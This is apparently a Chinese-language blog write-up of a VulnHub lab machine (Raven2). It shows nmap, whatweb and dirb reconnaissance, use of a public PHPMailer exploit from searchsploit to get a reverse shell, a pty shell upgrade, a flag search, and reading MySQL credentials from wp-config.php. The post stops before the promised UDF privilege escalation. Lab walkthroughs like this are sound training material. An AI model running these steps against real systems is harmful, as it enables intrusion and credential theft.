Raven2靶机渗透

Raven2靶机渗透

因为头一次涉及到liunx mysqludf的提权,所以这一次对该靶机进行一次完整的渗透测试。

靶机地址:

https://download.vulnhub.com/raven/Raven2.ova

image-20220225103226230

搭建好并开机就好了。

1.信息收集

1
nmap -sP 192.168.137.0/24 -sP 进行ping扫描

实现对网段的快速扫描

image-20220225103456133

这里自己知道新靶机地址为192.168.137.143.

再一次用nmap综合扫描该ip地址

1
nmap -A 192.168.137.143

image-20220225104202348

使用浏览器访问该IP地址,发现是一个奇奇怪怪的网页。想到网页就想先扫cms,使用whatweb扫描该网址。

1
whatweb -v 192.168.137.143

image-20220225104353186

但是发现不了该网站的cms。

于是使用目录扫描

1
dirb http://192.168.137.143:80

image-20220225104437436

扫描的东西很多很多,只有一个个看,一个个点,访问到了vendor目录。并且在/PATH文件下找到了第一个flag

image-20220225104554872

同时多做信息收集,可以发现该网站上搭建了phpmailer这个服务。

2.拿到权限

在kali命令行中输入searchsploit phpma13iler,寻找可用的exp

1
searchsploit phpmailer

image-20220225105340388

这里我选择按照网上的方法来看,于是使用php/webapps/40974.py

使用命令

1
searchsploit -x exploits/php/webapps/40974.py

在本机中找到该文件复制下来,然后修改payload

image-20220226171150109

之后使用命令

1
python3 40974.py

image-20220226171021436

使用nc监听4444端口准备等待反弹shell。访问192.168.137.143/contant.php执行我们得后门,生成后门文件。随后访问192.168.137.143/shell.php得到反弹shell。

image-20220226171512287

输入

1
python -c 'import pty;pty.spawn("/bin/bash")'

获得一个类似于交互式得shell。

之后可以查找flag

1
find / -name "flag*"

image-20220226171822411

获得第二个flag

image-20220226171905752

发现第三个flag是在/var/www/html(即表示网站服务下,所以可以直接访问该地址)

image-20220226172412484

3.UDF提权

接下来去找寻到/var/www/html/wordpress目录下有一个文件名为wp-config.php的文件。

可以找到mysql数据库的用户名和密码

image-20220226173258537

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br><br>平荒尽处是春山<br>Life is a fucking movie.